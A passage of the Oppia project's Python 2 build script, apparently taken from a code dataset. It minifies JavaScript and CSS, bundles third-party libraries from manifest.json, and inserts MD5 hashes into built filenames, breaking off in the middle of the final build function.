source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
build.py
|
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Build file for production version of Oppia. Minifies JS and CSS."""
# pylint: disable=invalid-name
import collections
import fnmatch
import hashlib
import json
import optparse
import os
import re
import shutil
import subprocess
import threading
ASSETS_DEV_DIR = os.path.join('assets', '')
ASSETS_OUT_DIR = os.path.join('build', 'assets', '')
THIRD_PARTY_STATIC_DIR = os.path.join('third_party', 'static')
THIRD_PARTY_GENERATED_DEV_DIR = os.path.join('third_party', 'generated', '')
THIRD_PARTY_GENERATED_OUT_DIR = os.path.join(
'build', 'third_party', 'generated', '')
THIRD_PARTY_JS_RELATIVE_FILEPATH = os.path.join('js', 'third_party.js')
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH = os.path.join(
'js', 'third_party.min.js')
THIRD_PARTY_CSS_RELATIVE_FILEPATH = os.path.join('css', 'third_party.css')
MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH = os.path.join(
'css', 'third_party.min.css')
FONTS_RELATIVE_DIRECTORY_PATH = os.path.join('fonts', '')
EXTENSIONS_DIRNAMES_TO_DIRPATHS = {
'dev_dir': os.path.join('extensions', ''),
'staging_dir': os.path.join('backend_prod_files', 'extensions', ''),
'out_dir': os.path.join('build', 'extensions', '')
}
TEMPLATES_DEV_DIR = os.path.join('templates', 'dev', 'head', '')
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS = {
'dev_dir': os.path.join('core', 'templates', 'dev', 'head', ''),
'staging_dir': os.path.join('backend_prod_files', 'templates', 'head', ''),
'out_dir': os.path.join('build', 'templates', 'head', '')
}
HASHES_JS_FILENAME = 'hashes.js'
HASHES_JS_FILEPATH = os.path.join(ASSETS_DEV_DIR, HASHES_JS_FILENAME)
MANIFEST_FILE_PATH = os.path.join('manifest.json')
REMOVE_WS = re.compile(r'\s{2,}').sub
YUICOMPRESSOR_DIR = os.path.join(
'..', 'oppia_tools', 'yuicompressor-2.4.8', 'yuicompressor-2.4.8.jar')
PARENT_DIR = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
NODE_FILE = os.path.join(
PARENT_DIR, 'oppia_tools', 'node-6.9.1', 'bin', 'node')
UGLIFY_FILE = os.path.join(
PARENT_DIR, 'node_modules', 'uglify-js', 'bin', 'uglifyjs')
# Files with these extensions shouldn't be moved to build directory.
FILE_EXTENSIONS_TO_IGNORE = ('.py', '.pyc', '.stylelintrc')
# Files with these name patterns shouldn't be moved to build directory, and will
# not be served in production. (This includes protractor.js files in
# /extensions.)
JS_FILENAME_SUFFIXES_TO_IGNORE = ('Spec.js', 'protractor.js')
GENERAL_FILENAMES_TO_IGNORE = ('.pyc', '.stylelintrc')
# These filepaths shouldn't be renamed (i.e. the filepath shouldn't contain
# hash).
# This is because these files don't need cache invalidation, are referenced
# from third party files or should not be moved to the build directory.
FILEPATHS_NOT_TO_RENAME = (
'*.py',
'third_party/generated/fonts/*',
'third_party/generated/js/third_party.min.js.map')
# Hashes for files with these paths should be provided to the frontend in
# JS hashes object.
FILEPATHS_PROVIDED_TO_FRONTEND = (
'images/*', 'videos/*', 'i18n/*', '*_directive.html', '*.png', '*.json')
HASH_BLOCK_SIZE = 2**20
def _minify(source_path, target_path):
"""Runs the given file through a minifier and outputs it to target_path.
Args:
source_path: str. Absolute path to file to be minified.
target_path: str. Absolute path to location where to copy
the minified file.
"""
cmd = 'java -jar %s %s -o %s' % (
YUICOMPRESSOR_DIR, source_path, target_path)
subprocess.check_call(cmd, shell=True)
def write_to_file_stream(file_stream, content):
"""Write to a file object using provided content.
Args:
file_stream: file. A stream handling object to do write operation on.
content: str. String content to write to file object.
"""
file_stream.write(content)
def _join_files(source_paths, target_file_stream):
"""Writes multiple files into one file.
Args:
source_paths: list(str). Paths to files to join together.
target_file_stream: file. A stream object of target file.
"""
for source_path in source_paths:
with open(source_path, 'r') as source_file:
write_to_file_stream(target_file_stream, source_file.read())
def _minify_and_create_sourcemap(source_path, target_file_path):
"""Minifies and generates source map for a JS file. This function is only
meant to be used with third_party.min.js.
Args:
source_path: str. Path to JS file to minify.
target_file_path: str. Path to location of the minified file.
"""
print 'Minifying and creating sourcemap for %s' % source_path
source_map_properties = 'includeSources,url=\'third_party.min.js.map\''
cmd = '%s %s %s -c -m --source-map %s -o %s ' % (
NODE_FILE, UGLIFY_FILE, source_path,
source_map_properties, target_file_path)
subprocess.check_call(cmd, shell=True)
def _generate_copy_tasks_for_fonts(source_paths, target_path):
"""Queue up a copy task for each font file.
Args:
source_paths: list(str). Paths to fonts.
target_path: str. Path where the fonts should be copied.
Returns:
deque(Thread). A deque that contains all copy tasks queued
to be processed.
"""
copy_tasks = collections.deque()
for font_path in source_paths:
copy_task = threading.Thread(
target=shutil.copy,
args=(font_path, target_path,))
copy_tasks.append(copy_task)
return copy_tasks
def _insert_hash(filepath, file_hash):
"""Inserts hash into filepath before the file extension.
Args:
filepath: str. Path where the hash should be inserted.
file_hash: str. Hash to be inserted into the path.
Returns:
str. Filepath with hash inserted.
"""
filepath, file_extension = os.path.splitext(filepath)
return '%s.%s%s' % (filepath, file_hash, file_extension)
def ensure_directory_exists(filepath):
"""Ensures if directory tree exists, if not creates the directories.
Args:
filepath: str. Path to file located in directory that we want to
ensure exists.
"""
directory = os.path.dirname(filepath)
if not os.path.exists(directory):
os.makedirs(directory)
def safe_delete_directory_tree(directory_path):
"""Recursively delete a directory tree. If directory tree does not exist,
create the directories first then delete the directory tree.
Args:
directory_path: str. Directory path to be deleted.
"""
ensure_directory_exists(directory_path)
shutil.rmtree(directory_path)
def _ensure_files_exist(filepaths):
"""Ensures that files exist at the given filepaths.
Args:
filepaths: list(str). Paths to files that we want to ensure exist.
Raises:
OSError: One or more of the files does not exist.
"""
for filepath in filepaths:
if not os.path.isfile(filepath):
raise OSError('File %s does not exist.' % filepath)
def safe_copy_file(source_filepath, target_filepath):
"""Copy a file (no metadata) after ensuring the file exists at the given
source filepath.
NOTE: shutil.copyfile does not accept directory path as arguments.
Args:
source_filepath: str. Path to source file that we want to copy from.
target_filepath: str. Path to target file that we want to copy to.
"""
_ensure_files_exist([source_filepath])
shutil.copyfile(source_filepath, target_filepath)
def safe_delete_file(filepath):
"""Delete a file after ensuring the provided file actually exists.
Args:
filepath: str. Filepath to be deleted.
"""
_ensure_files_exist([filepath])
os.remove(filepath)
def get_file_count(directory_path):
"""Count total number of file in the given directory, ignoring any files
with extensions in FILE_EXTENSIONS_TO_IGNORE or files that should not be
built.
Args:
directory_path: str. Directory to be walked.
Returns:
int. Total number of files minus ignored files.
"""
total_file_count = 0
for _, _, filenames in os.walk(directory_path):
for filename in filenames:
# Ignore files with certain extensions.
if should_file_be_built(filename) and not any(
filename.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
total_file_count += 1
return total_file_count
def _compare_file_count(first_dir_path, second_dir_path):
"""Ensure that two dir's file counts match.
Args:
first_dir_path: str. First directory to compare.
second_dir_path: str. Second directory to compare.
Raises:
ValueError: The source directory does not have the same file count as
the target directory.
"""
first_dir_file_count = get_file_count(first_dir_path)
second_dir_file_count = get_file_count(second_dir_path)
if first_dir_file_count != second_dir_file_count:
print 'Comparing %s vs %s' % (first_dir_path, second_dir_path)
raise ValueError(
'%s files in first dir != %s files in second dir' % (
first_dir_file_count, second_dir_file_count))
def process_html(source_file_stream, target_file_stream, file_hashes):
"""Remove whitespaces and add hashes to filepaths in the HTML file stream
object.
Args:
source_file_stream: file. The stream object of the HTML file to be
read from.
target_file_stream: file. The stream object to write the minified HTML
file to.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
"""
content = source_file_stream.read()
for filepath, file_hash in file_hashes.iteritems():
# We are adding hash in all file paths except for html paths.
# This is because html paths are used by backend and we work with
# paths without hash part in backend.
if not filepath.endswith('.html'):
filepath_with_hash = _insert_hash(filepath, file_hash)
content = content.replace(
'%s%s' % (TEMPLATES_DEV_DIR, filepath),
'%s%s' % (
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['out_dir'],
filepath_with_hash))
content = content.replace(
'%s%s' % (ASSETS_DEV_DIR, filepath),
'%s%s' % (ASSETS_OUT_DIR, filepath_with_hash))
content = content.replace(
'%s%s' % (EXTENSIONS_DIRNAMES_TO_DIRPATHS['dev_dir'], filepath),
'%s%s' % (
EXTENSIONS_DIRNAMES_TO_DIRPATHS['out_dir'],
filepath_with_hash))
content = content.replace(
'%s%s' % (THIRD_PARTY_GENERATED_DEV_DIR, filepath),
'%s%s' % (THIRD_PARTY_GENERATED_OUT_DIR, filepath_with_hash))
content = REMOVE_WS(' ', content)
write_to_file_stream(target_file_stream, content)
def get_dependency_directory(dependency):
"""Get dependency directory from dependecy dictionary.
Args:
dependency: dict(str, str). Dictionary representing single dependency
from manifest.json.
Returns:
str. Dependency directory.
"""
if 'targetDir' in dependency:
dependency_dir = dependency['targetDir']
else:
dependency_dir = dependency['targetDirPrefix'] + dependency['version']
return os.path.join(THIRD_PARTY_STATIC_DIR, dependency_dir)
def get_css_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency css filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to css files that need to be copied.
"""
css_files = dependency_bundle.get('css', [])
return [os.path.join(dependency_dir, css_file) for css_file in css_files]
def get_js_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency js filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to js files that need to be copied.
"""
js_files = dependency_bundle.get('js', [])
return [os.path.join(dependency_dir, js_file) for js_file in js_files]
def get_font_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency font filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to font files that need to be copied.
"""
if 'fontsPath' not in dependency_bundle:
# Skip dependency bundles in manifest.json that do not have
# fontsPath property.
return []
fonts_path = dependency_bundle['fontsPath']
# Obtain directory path to /font inside dependency folder.
# E.g. third_party/static/bootstrap-3.3.4/fonts/.
font_dir = os.path.join(dependency_dir, fonts_path)
font_filepaths = []
# Walk the directory and add all font files to list.
for root, _, filenames in os.walk(font_dir):
for filename in filenames:
font_filepaths.append(os.path.join(root, filename))
return font_filepaths
def get_dependencies_filepaths():
"""Extracts dependencies filepaths from manifest.json file into
a dictionary.
Returns:
dict(str, list(str)). A dict mapping file types to lists of filepaths.
The dict has three keys: 'js', 'css' and 'fonts'. Each of the
corresponding values is a full list of dependency file paths of the
given type.
"""
filepaths = {
'js': [],
'css': [],
'fonts': []
}
with open(MANIFEST_FILE_PATH, 'r') as json_file:
manifest = json.loads(
json_file.read(), object_pairs_hook=collections.OrderedDict)
frontend_dependencies = manifest['dependencies']['frontend']
for dependency in frontend_dependencies.values():
if 'bundle' in dependency:
dependency_dir = get_dependency_directory(dependency)
filepaths['css'].extend(
get_css_filepaths(dependency['bundle'], dependency_dir))
filepaths['js'].extend(
get_js_filepaths(dependency['bundle'], dependency_dir))
filepaths['fonts'].extend(
get_font_filepaths(dependency['bundle'], dependency_dir))
_ensure_files_exist(filepaths['js'])
_ensure_files_exist(filepaths['css'])
_ensure_files_exist(filepaths['fonts'])
return filepaths
def minify_third_party_libs(third_party_directory_path):
"""Minify third_party.js and third_party.css and remove un-minified
files.
"""
THIRD_PARTY_JS_FILEPATH = os.path.join(
third_party_directory_path, THIRD_PARTY_JS_RELATIVE_FILEPATH)
THIRD_PARTY_CSS_FILEPATH = os.path.join(
third_party_directory_path, THIRD_PARTY_CSS_RELATIVE_FILEPATH)
MINIFIED_THIRD_PARTY_JS_FILEPATH = os.path.join(
third_party_directory_path, MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH)
MINIFIED_THIRD_PARTY_CSS_FILEPATH = os.path.join(
third_party_directory_path, MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH)
_minify_and_create_sourcemap(
THIRD_PARTY_JS_FILEPATH, MINIFIED_THIRD_PARTY_JS_FILEPATH)
_minify(THIRD_PARTY_CSS_FILEPATH, MINIFIED_THIRD_PARTY_CSS_FILEPATH)
# Clean up un-minified third_party.js and third_party.css.
safe_delete_file(THIRD_PARTY_JS_FILEPATH)
safe_delete_file(THIRD_PARTY_CSS_FILEPATH)
def build_third_party_libs(third_party_directory_path):
"""Joins all third party css files into single css file and js files into
single js file. Copies both files and all fonts into third party folder.
"""
print 'Building third party libs at %s' % third_party_directory_path
THIRD_PARTY_JS_FILEPATH = os.path.join(
third_party_directory_path, THIRD_PARTY_JS_RELATIVE_FILEPATH)
THIRD_PARTY_CSS_FILEPATH = os.path.join(
third_party_directory_path, THIRD_PARTY_CSS_RELATIVE_FILEPATH)
FONTS_DIR = os.path.join(
third_party_directory_path, FONTS_RELATIVE_DIRECTORY_PATH)
dependency_filepaths = get_dependencies_filepaths()
ensure_directory_exists(THIRD_PARTY_JS_FILEPATH)
with open(THIRD_PARTY_JS_FILEPATH, 'w+') as third_party_js_file:
_join_files(dependency_filepaths['js'], third_party_js_file)
ensure_directory_exists(THIRD_PARTY_CSS_FILEPATH)
with open(THIRD_PARTY_CSS_FILEPATH, 'w+') as third_party_css_file:
_join_files(dependency_filepaths['css'], third_party_css_file)
ensure_directory_exists(FONTS_DIR)
_execute_tasks(
_generate_copy_tasks_for_fonts(
dependency_filepaths['fonts'], FONTS_DIR))
def hash_should_be_inserted(filepath):
"""Returns if the file should be renamed to include hash in
the path.
Args:
filepath: str. Path relative to directory we are currently building.
Returns:
bool. True if filepath should contain hash else False.
"""
return not any(fnmatch.fnmatch(filepath, pattern) for pattern
in FILEPATHS_NOT_TO_RENAME)
def should_file_be_built(filepath):
"""Determines if the file should be built.
- JS files: Returns False if filepath matches with pattern in
JS_FILENAME_SUFFIXES_TO_IGNORE, else returns True.
- Python files: Returns False if filepath ends with _test.py, else
returns True
- Other files: Returns False if filepath matches with pattern in
GENERAL_FILENAMES_TO_IGNORE, else returns True.
Args:
filepath: str. Path relative to file we are currently building.
Returns:
bool. True if filepath should be built, else False.
"""
if filepath.endswith('.js'):
return not any(
filepath.endswith(p) for p in JS_FILENAME_SUFFIXES_TO_IGNORE)
elif filepath.endswith('_test.py'):
return False
else:
return not any(
filepath.endswith(p) for p in GENERAL_FILENAMES_TO_IGNORE)
def generate_copy_tasks_to_copy_from_source_to_target(
source, target, file_hashes):
"""Generate copy task for each file in source directory, excluding files
with extensions in FILE_EXTENSIONS_TO_IGNORE. Insert hash from hash dict
into the destination filename.
Args:
source: str. Path relative to /oppia directory of directory
containing files and directories to be copied.
target: str. Path relative to /oppia directory of directory where
to copy the files and directories.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
deque(Thread). A deque that contains all copy tasks queued
to be processed.
"""
print 'Processing %s' % os.path.join(os.getcwd(), source)
print 'Copying into %s' % os.path.join(os.getcwd(), target)
copy_tasks = collections.deque()
for root, dirnames, filenames in os.walk(os.path.join(os.getcwd(), source)):
for directory in dirnames:
print 'Copying %s' % os.path.join(root, directory)
for filename in filenames:
source_path = os.path.join(root, filename)
# Python files should not be copied to final build directory.
if not any(
source_path.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
target_path = source_path
relative_path = os.path.relpath(source_path, source)
if hash_should_be_inserted(source + relative_path):
relative_path = (
_insert_hash(relative_path, file_hashes[relative_path]))
target_path = os.path.join(os.getcwd(), target, relative_path)
ensure_directory_exists(target_path)
copy_task = threading.Thread(
target=safe_copy_file,
args=(source_path, target_path,))
copy_tasks.append(copy_task)
return copy_tasks
def is_file_hash_provided_to_frontend(filepath):
"""Returns if the hash for the filepath should be provided to the frontend.
Args:
filepath: str. Relative path to the file.
Returns:
bool. True if file hash should be provided to the frontend else False.
"""
return any(fnmatch.fnmatch(filepath, pattern) for pattern
in FILEPATHS_PROVIDED_TO_FRONTEND)
def generate_md5_hash(filepath):
"""Returns md5 hash of file.
Args:
filepath: str. Absolute path to the file.
Returns:
str. Hexadecimal hash of specified file.
"""
m = hashlib.md5()
with open(filepath, 'rb') as f:
while True:
buf = f.read(HASH_BLOCK_SIZE)
if not buf:
break
m.update(buf)
return m.hexdigest()
def get_filepaths_by_extensions(source_dir, file_extensions):
"""Return list of filepaths in a directory with certain extensions,
excluding filepaths that should not be built.
Args:
source_dir: str. Root directory to be walked.
file_extensions: tuple(str). Tuple of file extensions.
Returns:
list(str). List of filepaths with specified extensions.
"""
filepaths = []
for root, _, filenames in os.walk(source_dir):
for filename in filenames:
filepath = os.path.join(root, filename)
relative_filepath = os.path.relpath(filepath, source_dir)
if should_file_be_built(filename) and any(
filename.endswith(p) for p in file_extensions):
filepaths.append(relative_filepath)
return filepaths
def get_file_hashes(directory_path):
"""Returns hashes of all files in directory tree, excluding files with
extensions in FILE_EXTENSIONS_TO_IGNORE or files that should not be built.
Args:
directory_path: str. Root directory of the tree.
Returns:
dict(str, str). Dictionary with keys specifying file paths and values
specifying file hashes.
"""
file_hashes = dict()
print('Computing hashes for files in %s'
% os.path.join(os.getcwd(), directory_path))
for root, dirnames, filenames in os.walk(
os.path.join(os.getcwd(), directory_path)):
for directory in dirnames:
print('Computing hashes for files in %s'
% os.path.join(root, directory))
for filename in filenames:
if should_file_be_built(filename) and not any(
filename.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
complete_filepath = os.path.join(root, filename)
relative_filepath = os.path.relpath(
complete_filepath, directory_path)
file_hashes[relative_filepath] = generate_md5_hash(
complete_filepath)
return file_hashes
def filter_hashes(file_hashes):
"""Filters hashes that should be provided to the frontend
and prefixes "/" in front of the keys.
Args:
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
dict(str, str). Filtered dictionary of only filepaths that should be
provided to the frontend.
"""
filtered_hashes = dict()
for filepath, file_hash in file_hashes.iteritems():
if is_file_hash_provided_to_frontend(filepath):
filtered_hashes['/' + filepath] = file_hash
return filtered_hashes
def get_hashes_json_file_contents(file_hashes):
"""Return JS code that loads hashes needed for frontend into variable.
Args:
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
str. JS code loading hashes as JSON into variable.
"""
# Only some of the hashes are needed in the frontend.
filtered_hashes = filter_hashes(file_hashes)
hashes_json = json.dumps(filtered_hashes)
return 'var hashes = JSON.parse(\'%s\');' % (hashes_json)
def minify_func(source_path, target_path, file_hashes, filename):
"""Call the appropriate functions to handle different types of file
formats:
- HTML files: Remove whitespaces, interpolates paths in HTML to include
hashes in source directory and save edited file at target directory.
- CSS or JS files: Minify and save at target directory.
- Other files: Copy the file from source directory to target directory.
"""
if filename.endswith('.html'):
print 'Building %s' % source_path
with open(source_path, 'r+') as source_html_file:
with open(target_path, 'w+') as minified_html_file:
process_html(source_html_file, minified_html_file, file_hashes)
elif filename.endswith('.css') or filename.endswith('.js'):
print 'Minifying %s' % source_path
_minify(source_path, target_path)
else:
print 'Copying %s' % source_path
safe_copy_file(source_path, target_path)
def _execute_tasks(tasks, batch_size=24):
"""Starts all tasks and checks the results.
Runs no more than 'batch_size' tasks at a time.
"""
remaining_tasks = collections.deque(tasks)
currently_running_tasks = []
while remaining_tasks or currently_running_tasks:
if currently_running_tasks:
for task in collections.deque(currently_running_tasks):
if not task.is_alive():
currently_running_tasks.remove(task)
while remaining_tasks and len(currently_running_tasks) < batch_size:
task = remaining_tasks.popleft()
currently_running_tasks.append(task)
try:
task.start()
except RuntimeError as threadAlreadyStarted:
raise OSError(threadAlreadyStarted.message)
def generate_build_tasks_to_build_all_files_in_directory(
source, target, file_hashes):
"""This function queues up tasks to build all files in a directory,
excluding files that should not be built.
Args:
source: str. Path relative to /oppia of directory containing source
files and directories to be built.
target: str. Path relative to /oppia of directory where the built files
and directories will be saved to.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
print 'Processing %s' % os.path.join(os.getcwd(), source)
print 'Generating into %s' % os.path.join(os.getcwd(), target)
build_tasks = collections.deque()
for root, dirnames, filenames in os.walk(os.path.join(os.getcwd(), source)):
for directory in dirnames:
print 'Building directory %s' % os.path.join(root, directory)
for filename in filenames:
source_path = os.path.join(root, filename)
target_path = source_path.replace(source, target)
ensure_directory_exists(target_path)
if should_file_be_built(source_path):
task = threading.Thread(
target=minify_func,
args=(source_path, target_path, file_hashes, filename,))
build_tasks.append(task)
return build_tasks
def generate_build_tasks_to_build_files_from_filepaths(
source_path, target_path, filepaths, file_hashes):
"""This function queues up build tasks to build files from a list of
filepaths, excluding files that should not be built.
Args:
source_path: str. Path relative to /oppia directory of directory
containing files and directories to be copied.
target_path: str. Path relative to /oppia directory of directory where
to copy the files and directories.
filepaths: list(str). List of filepaths to be built.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
build_tasks = collections.deque()
for filepath in filepaths:
source_file_path = os.path.join(source_path, filepath)
target_file_path = os.path.join(target_path, filepath)
ensure_directory_exists(target_file_path)
if should_file_be_built(source_path):
task = threading.Thread(
target=minify_func,
args=(
source_file_path, target_file_path, file_hashes, filepath,))
build_tasks.append(task)
return build_tasks
def generate_delete_tasks_to_remove_deleted_files(
source_dir_hashes, staging_directory):
"""This function walks the staging directory and queues up deletion tasks to
remove files that are not in the hash dict i.e. remaining files in staging
directory that have since been deleted from source directory. Files with
extensions in FILE_EXTENSIONS_TO_IGNORE will be excluded.
Args:
source_dir_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
staging_directory: str. Path relative to /oppia directory of directory
containing files and directories to be walked.
Returns:
deque(Thread). A deque that contains all delete tasks
queued to be processed.
"""
print 'Scanning directory %s to remove deleted file' % staging_directory
delete_tasks = collections.deque()
for root, dirnames, filenames in os.walk(
os.path.join(os.getcwd(), staging_directory)):
for directory in dirnames:
print 'Scanning %s' % os.path.join(root, directory)
for filename in filenames:
target_path = os.path.join(root, filename)
# Ignore files with certain extensions.
if not any(
target_path.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
relative_path = os.path.relpath(target_path, staging_directory)
# Remove file found in staging directory but not in source
# directory, i.e. file not listed in hash dict.
if relative_path not in source_dir_hashes:
print ('Unable to find %s in file hashes, deleting file'
% target_path)
task = threading.Thread(
target=safe_delete_file, args=(target_path,))
delete_tasks.append(task)
return delete_tasks
def get_recently_changed_filenames(source_dir_hashes, out_dir):
"""Compare hashes of source files and built files. Return a list of
filenames that were recently changed. Skips files that are not supposed to
built or already built.
Args:
source_dir_hashes: dict(str, str). Dictionary of hashes of files
to be built.
out_dir: str. Path relative to /oppia where built files are located.
Returns:
list(str). List of filenames expected to be re-hashed.
"""
# Hashes are created based on files' contents and are inserted between
# the filenames and their extensions,
# e.g base.240933e7564bd72a4dde42ee23260c5f.html
# If a file gets edited, a different MD5 hash is generated.
recently_changed_filenames = []
# Currently, Python files and HTML files are always re-built.
FILE_EXTENSIONS_NOT_TO_TRACK = ('.html', '.py',)
for filename, md5_hash in source_dir_hashes.iteritems():
# Skip files that are already built or should not be built.
if should_file_be_built(filename) and not any(
filename.endswith(p) for p in FILE_EXTENSIONS_NOT_TO_TRACK):
final_filepath = _insert_hash(
os.path.join(out_dir, filename), md5_hash)
if not os.path.isfile(final_filepath):
# Filename with provided hash cannot be found, this file has
# been recently changed or created since last build.
recently_changed_filenames.append(filename)
if recently_changed_filenames:
print ('The following files will be rebuilt due to recent changes: %s' %
recently_changed_filenames)
return recently_changed_filenames
def generate_build_tasks_to_build_directory(dirnames_dict, file_hashes):
"""This function queues up build tasks to build all files in source
directory if there is no existing staging directory. Otherwise, selectively
queue up build tasks to build recently changed files.
Args:
dirnames_dict: dict(str, str). This dict should contain three keys,
with corresponding values as follows:
- 'dev_dir': the directory that contains source files to be built.
- 'staging_dir': the directory that contains minified files waiting
for final copy process.
- 'out_dir': the final directory that contains built files with hash
inserted into filenames.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
source_dir = dirnames_dict['dev_dir']
staging_dir = dirnames_dict['staging_dir']
out_dir = dirnames_dict['out_dir']
build_tasks = collections.deque()
if not os.path.isdir(staging_dir):
# If there is no staging dir, perform build process on all files.
print 'Creating new %s folder' % staging_dir
ensure_directory_exists(staging_dir)
build_tasks += generate_build_tasks_to_build_all_files_in_directory(
source_dir, staging_dir, file_hashes)
else:
# If staging dir exists, rebuild all HTML and Python files.
file_extensions_to_always_rebuild = ('.html', '.py',)
print (
'Staging dir exists, re-building all %s files'
% str(file_extensions_to_always_rebuild))
filenames_to_always_rebuild = get_filepaths_by_extensions(
source_dir, file_extensions_to_always_rebuild)
build_tasks += generate_build_tasks_to_build_files_from_filepaths(
source_dir, staging_dir, filenames_to_always_rebuild, file_hashes)
dev_dir_hashes = get_file_hashes(source_dir)
# Clean up files in staging directory that cannot be found in file
# hashes dictionary.
_execute_tasks(generate_delete_tasks_to_remove_deleted_files(
dev_dir_hashes, staging_dir))
print 'Getting files that have changed between %s and %s' % (
source_dir, out_dir)
recently_changed_filenames = get_recently_changed_filenames(
dev_dir_hashes, out_dir)
if recently_changed_filenames:
print 'Re-building recently changed files at %s' % source_dir
build_tasks += generate_build_tasks_to_build_files_from_filepaths(
source_dir, staging_dir, recently_changed_filenames,
file_hashes)
else:
print 'No changes detected. Using previously built files.'
return build_tasks
def _verify_filepath_hash(relative_filepath, file_hashes):
"""Ensure that hashes in filepaths match with the hash entries in hash
dict.
Args:
relative_filepath: str. Filepath that is relative from /build.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Raises:
ValueError: The hash dict is empty.
ValueError: Filepath has less than 2 partitions after splitting by '.'
delimiter.
ValueError: The filename does not contain hash.
KeyError: The filename's hash cannot be found in the hash dict.
"""
# Final filepath example:
# head/pages/base.240933e7564bd72a4dde42ee23260c5f.html.
if not file_hashes:
raise ValueError('Hash dict is empty')
filename_partitions = relative_filepath.split('.')
if len(filename_partitions) < 2:
raise ValueError('Filepath has less than 2 partitions after splitting')
hash_string_from_filename = filename_partitions[-2]
# Ensure hash string obtained from filename follows MD5 hash format.
if not re.search(r'([a-fA-F\d]{32})', relative_filepath):
raise ValueError(
'%s is expected to contain MD5 hash' % relative_filepath)
if hash_string_from_filename not in file_hashes.values():
raise KeyError(
'Hash from file named %s does not match hash dict values' %
relative_filepath)
def _verify_build(input_dirnames, output_dirnames, file_hashes):
"""Verify a few metrics after build process finishes:
1) Number of files between source directory and final directory
matches.
2) The hashes in filenames belongs to the hash dict.
3) hashes.js, third_party.min.css and third_party.min.js are built and
hashes are inserted.
Args:
input_dirnames: list(str). List of directory paths that contain
source files.
output_dirnames: list(str). List of directory paths that contain
built files.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
"""
for i in xrange(len(input_dirnames)):
# Make sure that all files in source directory and staging directory are
# accounted for.
_compare_file_count(input_dirnames[i], output_dirnames[i])
# Make sure that hashed file name matches with current hash dict.
for built_dir in output_dirnames:
for root, _, filenames in os.walk(built_dir):
for filename in filenames:
parent_dir = os.path.basename(root)
converted_filepath = os.path.join(
THIRD_PARTY_GENERATED_DEV_DIR, parent_dir, filename)
if hash_should_be_inserted(converted_filepath):
# Obtain the same filepath format as the hash dict's key.
relative_filepath = os.path.relpath(
os.path.join(root, filename), built_dir)
_verify_filepath_hash(relative_filepath, file_hashes)
hash_final_filename = _insert_hash(
HASHES_JS_FILENAME, file_hashes[HASHES_JS_FILENAME])
third_party_js_final_filename = _insert_hash(
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH,
file_hashes[MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH])
third_party_css_final_filename = _insert_hash(
MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH,
file_hashes[MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH])
_ensure_files_exist([
os.path.join(ASSETS_OUT_DIR, hash_final_filename),
os.path.join(
THIRD_PARTY_GENERATED_OUT_DIR, third_party_js_final_filename),
os.path.join(
THIRD_PARTY_GENERATED_OUT_DIR, third_party_css_final_filename)])
def generate_build_directory():
"""Generates hashes for files. Minifies files and interpolates paths
in HTMLs to include hashes. Renames the files to include hashes and copies
them into build directory.
"""
print 'Building Oppia in production mode...'
# The keys for hashes are filepaths relative to the subfolders of the future
# /build folder. This is so that the replacing inside the HTML files works
# correctly.
hashes = dict()
build_tasks = collections.deque()
copy_tasks = collections.deque()
# Create hashes for all directories and files.
HASH_DIRS = [
